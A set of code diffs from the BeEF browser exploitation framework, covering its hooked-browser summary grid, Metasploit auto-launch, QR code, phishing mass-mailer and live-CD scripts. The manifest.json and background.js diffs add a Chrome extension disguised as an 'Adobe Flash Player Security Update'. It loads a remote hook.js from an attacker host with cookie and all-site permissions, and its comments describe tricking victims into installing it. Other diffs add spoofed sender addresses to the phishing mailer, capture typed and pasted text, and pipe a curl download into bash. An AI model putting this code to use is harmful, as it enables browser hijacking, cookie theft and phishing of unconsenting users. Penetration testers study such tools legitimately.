+        ['Hooked Page', 'Page Title',    'PageTitle'],
+        ['Hooked Page', 'Page URI',      'PageURI'],
+        ['Hooked Page', 'Page Referrer', 'PageReferrer'],
+        ['Hooked Page', 'Hook Host',     'HostName'],
+        ['Hooked Page', 'Cookies',       'Cookies'],
+
+        # Host
+        ['Host', 'Date',             'DateStamp'],
+        ['Host', 'Operating System', 'OsName'],
+        ['Host', 'Hardware',         'Hardware'],
+        ['Host', 'CPU',              'CPU'],
+        ['Host', 'Screen Size',      'ScreenSize'],
+        ['Host', 'Touch Screen',     'TouchEnabled']
+    ]
+
+    # set and add the return values for each browser property
+    # in the form of: category, UI label, value
+    zombie_properties.each do |p|
+
+      case p[2]
+        when "BrowserName"
+          data   = BeEF::Core::Constants::Browsers.friendly_name(BD.get(self.targetsession.to_s, p[2])).to_s
+
+        when "ScreenSize"
+          screen_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = screen_size_hash['width']
+          height = screen_size_hash['height']
+          cdepth = screen_size_hash['colordepth']
+          data   = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
+
+        when "WindowSize"
+          window_size_hash = JSON.parse(BD.get(self.targetsession.to_s, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
+          width  = window_size_hash['width']
+          height = window_size_hash['height']
+          data   = "Width: #{width}, Height: #{height}"
+        else
+          data   = BD.get(self.targetsession, p[2])
+      end
+
+      # add property to summary hash
+      if not data.nil?
+        summary_grid_hash['results'].push({
+          'category' => p[0],
+          'data'     => { p[1] => CGI.escapeHTML("#{data}") },
+          'from'     => 'Initialization'
+        })
+      end
+
     end
 
-    # set and add the return values for the page uri
-    page_uri = BD.get(self.targetsession, 'PageURI')
-    if not page_uri.nil?
-      encoded_page_uri = CGI.escapeHTML(page_uri)
-      encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_uri_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the page referrer
-    page_referrer = BD.get(self.targetsession, 'PageReferrer')
-    if not page_referrer.nil?
-      encoded_page_referrer = CGI.escapeHTML(page_referrer)
-      encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
-
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_page_referrer_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the host name
-    host_name = BD.get(self.targetsession, 'HostName') 
-    if not host_name.nil?
-      encoded_host_name = CGI.escapeHTML(host_name)
-      encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
-    
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_host_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-	# set and add the return values for the date
-    date_stamp = BD.get(self.targetsession, 'DateStamp')
-    if not date_stamp.nil?
-      encoded_date_stamp = CGI.escapeHTML(date_stamp)
-      encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_date_stamp_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    os_name = BD.get(self.targetsession, 'OsName')
-    if not os_name.nil?
-      encoded_os_name = CGI.escapeHTML(os_name)
-      encoded_os_name_hash = { 'OS Name' => encoded_os_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_os_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the os name
-    hw_name = BD.get(self.targetsession, 'Hardware')
-    if not hw_name.nil?
-      encoded_hw_name = CGI.escapeHTML(hw_name)
-      encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_hw_name_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for the browser name
-    browser_name = BD.get(self.targetsession, 'BrowserName') 
-    if not browser_name.nil?
-      friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
-      browser_name_hash = { 'Browser Name' => friendly_browser_name }
-
-      browser_name_row = {
-        'category' => 'Browser',
-        'data' => browser_name_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_name_row) # add the row
-    end
-    
-    # set and add the return values for the browser version
-    browser_version = BD.get(self.targetsession, 'BrowserVersion') 
-    if not browser_version.nil?
-      encoded_browser_version = CGI.escapeHTML(browser_version)
-      browser_version_hash = { 'Browser Version' => encoded_browser_version }
-
-      browser_version_row = {
-        'category' => 'Browser',
-         'data' => browser_version_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_version_row) # add the row
-    end
-    
-    # set and add the return values for the browser ua string
-    browser_uastring = BD.get(self.targetsession, 'BrowserReportedName')
-    if not browser_uastring.nil?
-      browser_uastring_hash = { 'Browser UA String' => browser_uastring }
-
-      browser_uastring_row = {
-        'category' => 'Browser',
-         'data' => browser_uastring_hash,
-        'from' => 'Initialization'
-      }
-    
-      summary_grid_hash['results'].push(browser_uastring_row) # add the row
-    end
-    
-    # set and add the list of cookies
-    cookies = BD.get(self.targetsession, 'Cookies')
-    if not cookies.nil? and not cookies.empty?
-      encoded_cookies = CGI.escapeHTML(cookies)
-      encoded_cookies_hash = { 'Cookies' => encoded_cookies }
-      
-      page_name_row = {
-        'category' => 'Hooked Page',
-        'data' => encoded_cookies_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the list of plugins installed in the browser
-    browser_plugins = BD.get(self.targetsession, 'BrowserPlugins')
-    if not browser_plugins.nil? and not browser_plugins.empty?
-      encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
-      encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
-      
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_browser_plugins_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the System Platform
-    system_platform = BD.get(self.targetsession, 'SystemPlatform')
-    if not system_platform.nil?
-      encoded_system_platform = CGI.escapeHTML(system_platform)
-      encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
-
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_system_platform_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie screen size and color depth
-    screen_size = BD.get(self.targetsession, 'ScreenSize')
-    if not screen_size.nil?
-      
-      screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = screen_size_hash['width']
-      height = screen_size_hash['height']
-      colordepth = screen_size_hash['colordepth']
-
-      # construct the string to be displayed in the details tab
-      encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
-      encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_screen_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the zombie browser window size
-    window_size = BD.get(self.targetsession, 'WindowSize')
-    if not window_size.nil?
-
-      window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
-      width = window_size_hash['width']
-      height = window_size_hash['height']
-
-      # construct the string to be displayed in the details tab
-      encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
-      encoded_window_size_hash = { 'Window Size' => encoded_window_size }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_window_size_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for JavaEnabled
-    java_enabled = BD.get(self.targetsession, 'JavaEnabled')
-    if not java_enabled.nil?
-      encoded_java_enabled = CGI.escapeHTML(java_enabled)
-      encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_java_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for VBScriptEnabled
-    vbscript_enabled = BD.get(self.targetsession, 'VBScriptEnabled')
-    if not vbscript_enabled.nil?
-      encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
-      encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_vbscript_enabled_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasFlash
-    has_flash = BD.get(self.targetsession, 'HasFlash')
-    if not has_flash.nil?
-      encoded_has_flash = CGI.escapeHTML(has_flash)
-      encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_flash_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasPhonegap
-    has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
-    if not has_phonegap.nil?
-      encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
-      encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_phonegap_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasGoogleGears
-    has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
-    if not has_googlegears.nil?
-      encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
-      encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_googlegears_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasWebSocket
-    has_web_socket = BD.get(self.targetsession, 'HasWebSocket')
-    if not has_web_socket.nil?
-      encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
-      encoded_has_web_socket_hash = { 'Has GoogleGears' => encoded_has_web_socket }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_web_socket_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the yes|no value for HasActiveX
-    has_activex = BD.get(self.targetsession, 'HasActiveX')
-    if not has_activex.nil?
-      encoded_has_activex = CGI.escapeHTML(has_activex)
-      encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_activex_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasSessionCookies
-    has_session_cookies = BD.get(self.targetsession, 'hasSessionCookies')
-    if not has_session_cookies.nil?
-      encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
-      encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_session_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
-    # set and add the return values for hasPersistentCookies
-    has_persistent_cookies = BD.get(self.targetsession, 'hasPersistentCookies')
-    if not has_persistent_cookies.nil?
-      encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
-      encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
-
-      page_name_row = {
-        'category' => 'Browser',
-        'data' => encoded_has_persistent_cookies_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
- 
     summary_grid_hash
   end
-  
+
   attr_reader :targetsession
   attr_reader :targetid
   attr_reader :targetip
   attr_reader :cmd
-  
+
   protected
-  
+
   attr_writer :targetsession
   attr_writer :targetid
   attr_writer :targetip

extensions/demos/flash_update_chrome_extension/background.js

@@ -6,5 +6,6 @@
 
 d=document;
 e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e); 
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+

extensions/demos/flash_update_chrome_extension/manifest.json

@@ -1,26 +1,34 @@
 {
-  // Simple chrome extension 
-  // Just loads beef into the extension context.
-  // 
-  // You may need to set the IP address of the beef hook in background.js
-  // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/ 
+    // Simple chrome extension, by antisnatchor and Mike Haworth
+    // Just loads BeEF into the extension context.
+    //
+    // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+    // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+    //    Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+    // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+    //    In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+    //    so the extension can't be served by BeEF anymore. You need to trick the victim to install
+    //    the extension from Google Chrome store.
+    //
 
-  "name": "Adobe Flash Player",
-  "version": "11.2.202.235",
-  "description": "Introduces vulnerabilites into web browsers",
-  "background": {
-    "scripts": ["background.js"]
-  },
-  "icons": { 
-    "16": "icon16.png",
-    "48": "icon48.png",
-    "128": "icon128.png" 
-  },
-  "permissions": [
-	"tabs", 
-	"http://*/*", 
-	"https://*/*",
-  "file://*/*",
-  "cookies"
-  ]
+    "name": "Adobe Flash Player Security Update",
+    "manifest_version": 2,
+    "version": "11.5.502.149",
+    "description": "Updates Adobe Flash Player with latest securty updates",
+    "background": {
+        "scripts": ["background.js"]
+    },
+    "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+    "icons": {
+        "16": "icon16.png",
+        "48": "icon48.png",
+        "128": "icon128.png"
+    },
+    "permissions": [
+        "tabs",
+        "http://*/*",
+        "https://*/*",
+        "file://*/*",
+        "cookies"
+    ]
 }

extensions/evasion/config.yaml

@@ -9,7 +9,7 @@ beef:
             enable: true
             name: 'Evasion'
             authors: ["antisnatchor"]
-            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
+            exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js", "lib/mdetect.js"]
             scramble_variables: true
             scramble_cookies: true
             scramble:

extensions/events/handler.rb

@@ -52,7 +52,7 @@ module Events
         when 'click'
           result = "#{event['time']}s - [Mouse Click] x: #{event['x']} y:#{event['y']} > #{event['target']}"
         when 'focus'
-          result = "#{event['time']}s - [Focus] Browser has regained focus."
+          result = "#{event['time']}s - [Focus] Browser window has regained focus."
         when 'copy'
           result = "#{event['time']}s - [User Copied Text] \"#{event['data']}\""
         when 'cut'
@@ -60,7 +60,7 @@ module Events
         when 'paste'
           result = "#{event['time']}s - [User Pasted Text] \"#{event['data']}\""
         when 'blur'
-          result = "#{event['time']}s - [Blur] Browser has lost focus."
+          result = "#{event['time']}s - [Blur] Browser window has lost focus."
         when 'keys'
           result = "#{event['time']}s - [User Typed] \"#{event['data']}\" > #{event['target']}"
         when 'submit'

extensions/metasploit/config.yaml

@@ -29,9 +29,10 @@ beef:
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/opt/local/msf/'},
+              {os: 'livecd', path: '/opt/metasploit-framework/'},
               {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
               {os: 'bt5', path: '/opt/framework3/msf3/'},
               {os: 'backbox', path: '/opt/metasploit3/msf3/'},
-              {os: 'win', path: 'c:\metasploit\msf3\'},
+              {os: 'win', path: 'c:\\metasploit-framework\\'},
               {os: 'custom', path: ''}
             ]

extensions/metasploit/rpcclient.rb

@@ -36,10 +36,12 @@ module Metasploit
 			#auto start msfrpcd
 			if (@config['auto_msfrpcd'] || false)
 				launch_msf = ''
+				msf_os = ''
 				@config['msf_path'].each do |path|
 					if File.exist?(path['path'] + 'msfrpcd')
 						launch_msf = path['path'] + 'msfrpcd'
 						print_info 'Found msfrpcd: ' + launch_msf
+						msf_os = path['os'] 
 					end
 				end
 				if (launch_msf.length > 0)
@@ -53,32 +55,35 @@ module Metasploit
 					end
 
 					msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
+					if msf_os.eql? "win"
+						print_info 'Metasploit auto-launch is currently not supported in BeEF on MS Windows.'
+					else	
+						child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
 				
-					child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
-				
-					print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
+						print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
 
-					#Give daemon time to launch
-					#poll and giveup after timeout 
-					retries = @config['auto_msfrpcd_timeout']
-					uri = URI(msf_url)
-					http = Net::HTTP.new(uri.host, uri.port)
+						#Give daemon time to launch
+						#poll and giveup after timeout 
+						retries = @config['auto_msfrpcd_timeout']
+						uri = URI(msf_url)
+						http = Net::HTTP.new(uri.host, uri.port)
 
-					if opts[:ssl]
-						http.use_ssl = true
-					end
-					if not @config['ssl_verify']
-						http.verify_mode = OpenSSL::SSL::VERIFY_NONE
-					end
-					headers = {
-    						'Content-Type' => "binary/message-pack"
-					}
-					path = uri.path.empty? ? "/" : uri.path
-					begin
-						sleep 1
-						code = http.head(path, headers).code.to_i
-					rescue Exception
-						retry if (retries -= 1) > 0
+						if opts[:ssl]
+							http.use_ssl = true
+						end
+						if not @config['ssl_verify']
+							http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+						end
+						headers = {
+    							'Content-Type' => "binary/message-pack"
+						}
+						path = uri.path.empty? ? "/" : uri.path
+						begin
+							sleep 1
+							code = http.head(path, headers).code.to_i
+						rescue Exception
+							retry if (retries -= 1) > 0
+						end
 					end
 				else
 					print_error 'Please add a custom path for msfrpcd to the config-file.'

extensions/qrcode/qrcode.rb

@@ -13,18 +13,43 @@ module Qrcode
     
     def self.pre_http_start(http_hook_server)
       require 'uri'
-      
+
+      fullurls = []
+      partialurls = []
+
       configuration = BeEF::Core::Configuration.instance
-      BeEF::Core::Console::Banners.interfaces.each do |int|
-        next if int == "localhost" or int == "127.0.0.1"
-        print_success "QRCode images available for interface: #{int}"
+
+      configuration.get("beef.extension.qrcode.target").each do |target|
+        if target.lines.grep(/^https?:\/\//i).size > 0
+          fullurls << target
+        else
+          partialurls << target
+        end
+      end
+
+      if fullurls.size > 0
+        print_success "Custom QRCode images available:"
         data = ""
-        configuration.get("beef.extension.qrcode.target").each do |target|
-          url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
-          url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+        fullurls.each do |target|
+          url = URI.escape(target,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
           data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
         end
         print_more data
+
+      end
+      
+      if partialurls.size > 0
+        BeEF::Core::Console::Banners.interfaces.each do |int|
+          next if int == "localhost" or int == "127.0.0.1"
+          print_success "QRCode images available for interface: #{int}"
+          data = ""
+          partialurls.each do |target|
+            url = "http://#{int}:#{configuration.get("beef.http.port")}#{target}"
+            url = URI.escape(url,Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))
+            data += "https://chart.googleapis.com/chart?cht=qr&chs=#{configuration.get("beef.extension.qrcode.qrsize")}&chl=#{url}\n"
+          end
+          print_more data
+        end
       end
     end  
     

extensions/social_engineering/config.yaml

@@ -21,7 +21,7 @@ beef:
                 use_auth: true
                 use_tls: true
                 helo: "gmail.com" # this is usually the domain name
-                from: "youruser@gmail.com"
+                auth: "youruser@gmail.com"
                 password: "yourpass"
                 # available templates
                 templates:

extensions/social_engineering/mass_mailer/mass_mailer.rb

@@ -20,14 +20,14 @@ module BeEF
           @host = @config.get("#{@config_prefix}.host")
           @port = @config.get("#{@config_prefix}.port")
           @helo = @config.get("#{@config_prefix}.helo")
-          @from = @config.get("#{@config_prefix}.from")
+          @auth = @config.get("#{@config_prefix}.auth")
           @password = @config.get("#{@config_prefix}.password")
         end
 
         # tos_hash is an Hash like:
         # 'antisnatchor@gmail.com' => 'Michele'
         # 'ciccio@pasticcio.com' => 'Ciccio'
-        def send_email(template, fromname, subject, link, linktext, tos_hash)
+        def send_email(template, fromname, fromaddr, subject, link, linktext, tos_hash)
           # create new SSL context and disable CA chain validation
           if @config.get("#{@config_prefix}.use_tls")
             @ctx = OpenSSL::SSL::SSLContext.new
@@ -37,7 +37,7 @@ module BeEF
 
           n = tos_hash.size
           x = 1
-          print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
+          print_info "Sending #{n} mail(s) from [#{fromaddr}] - name [#{fromname}] using template [#{template}]:"
           print_info "subject: #{subject}"
           print_info "link: #{link}"
           print_info "linktext: #{linktext}"
@@ -47,19 +47,19 @@ module BeEF
           smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
 
           if @config.get("#{@config_prefix}.use_auth")
-            smtp.start(@helo, @from, @password, :login) do |smtp|
+            smtp.start(@helo, @auth, @password, :login) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
             end
           else
-            smtp.start(@helo, @from) do |smtp|
+            smtp.start(@helo, @auth) do |smtp|
               tos_hash.each do |to, name|
-                message = compose_email(fromname, to, name, subject, link, linktext, template)
-                smtp.send_message(message, @from, to)
+                message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+                smtp.send_message(message, fromaddr, to)
                 print_info "Mail #{x}/#{n} to [#{to}] sent."
                 x += 1
               end
@@ -67,33 +67,39 @@ module BeEF
           end
         end
 
-        def compose_email(fromname, to, name, subject, link, linktext, template)
-           msg_id = random_string(50)
-           boundary = "------------#{random_string(24)}"
-           rel_boundary = "------------#{random_string(24)}"
+        def compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
+          begin
+            msg_id = random_string(50)
+            boundary = "------------#{random_string(24)}"
+            rel_boundary = "------------#{random_string(24)}"
 
-           header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
-           rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           images = ""
-           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
-             images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
-           end
+            header = email_headers(fromaddr, fromname, @user_agent, to, subject, msg_id, boundary)
+            plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
+            rel_header = email_related(rel_boundary)
+            html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
-           attachments = ""
-           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
-             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
-               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
-             end
-           end
+            images = ""
+            @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
+              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
+            end
 
-           close = email_close(boundary)
+            attachments = ""
+            if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+              @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+                 attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+              end
+            end
 
-           message = header + plain_body + rel_header + html_body + images + attachments + close
-           print_debug "Raw Email content:\n #{message}"
-           message
+            close = email_close(boundary)
+          rescue Exception => e
+            print_error "Error constructing email."
+            raise
+          end
+
+          message = header + plain_body + rel_header + html_body + images + attachments + close
+          print_debug "Raw Email content:\n #{message}"
+          message
         end
 
         def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)

extensions/social_engineering/rest/socialengineering.rb

@@ -70,6 +70,7 @@ module BeEF
         #    "template": "default",
         #    "subject": "Hi from BeEF",
         #    "fromname": "BeEF",
+        #    "fromaddr": "beef@beef.com",
         #    "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
         #    "linktext": "http://beefproject.com",
         #    "recipients": [{
@@ -85,10 +86,11 @@ module BeEF
             template = body["template"]
             subject = body["subject"]
             fromname = body["fromname"]
+            fromaddr = body["fromaddr"]
             link = body["link"]
             linktext = body["linktext"]
 
-            if template.nil? || subject.nil? || fromname.nil? || link.nil? || linktext.nil?
+            if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
               print_error "All parameters are mandatory."
               halt 401
             end
@@ -106,11 +108,16 @@ module BeEF
                 halt 401
               end
             end
-
-          mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
-          mass_mailer.send_email(template, fromname, subject, link, linktext, recipients)
           rescue Exception => e
-            print_error "Invalid JSON input passed to endpoint /api/seng/clone_page"
+            print_error "Invalid JSON input passed to endpoint /api/seng/send_emails"
+            error 400
+          end
+
+          begin
+            mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
+            mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
+          rescue Exception => e
+            print_error "Invalid mailer configuration"
             error 400
           end
         end

install-beef

@@ -5,6 +5,8 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
+set -e
+
 clear
 echo "======================================"
 echo "          BeEF Installer   "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
 
 sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
 
-bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
+curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
 
 echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc
 

liveCD/BeEFLive.sh

@@ -0,0 +1,311 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+   
+#
+# This is the auto startup script for the BeEF Live CD. 
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: http://downloads.beefproject.com/BeEFLive1.4.iso
+# MD5 (BeEFLive1.4.iso) = 5167450078ef5e9b8d146113cd4ba67c
+#
+# This script contains a few fixes to make BeEF play nicely with the way  
+# remastersys creates the live cd distributable as well as generating host keys 
+# to enable SSH etc. The script also make it easy for the user to update/start 
+# the BeEF server
+#
+
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+	echo ""
+else
+	ln -s /opt/beef/ beef
+	ln -s /opt/metasploit-framework/ msf
+	ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# function to allow BeEF to run in the background
+#
+run_beef() {	
+	cd /opt/beef/
+	ruby beef -x
+}
+
+#
+# function to start msf and run in the background
+#
+run_msf() {	
+	# start msf
+	/opt/metasploit-framework/msfconsole -r /opt/beef/test/thirdparty/msf/unit/BeEF.rc 2> /dev/null
+}
+
+#
+# functions to enable or disable msf integration
+#
+enable_msf() {
+	# enable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\sfalse/metasploit:\n            enable: true/g;P;D' /opt/beef/config.yaml
+	# enable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\sfalse/auto_msfrpcd: true/g' /opt/beef/extensions/metasploit/config.yaml	
+}
+disable_msf() {
+	# disable msf integration in main config file
+	sed -i '1N;$!N;s/metasploit:\n\s\{1,\}enable:\strue/metasploit:\n            enable: false/g;P;D' /opt/beef/config.yaml
+	# disable auto_msfrpcd
+	sed -i 's/auto_msfrpcd:\strue/auto_msfrpcd: false/g' /opt/beef/extensions/metasploit/config.yaml
+}
+
+#
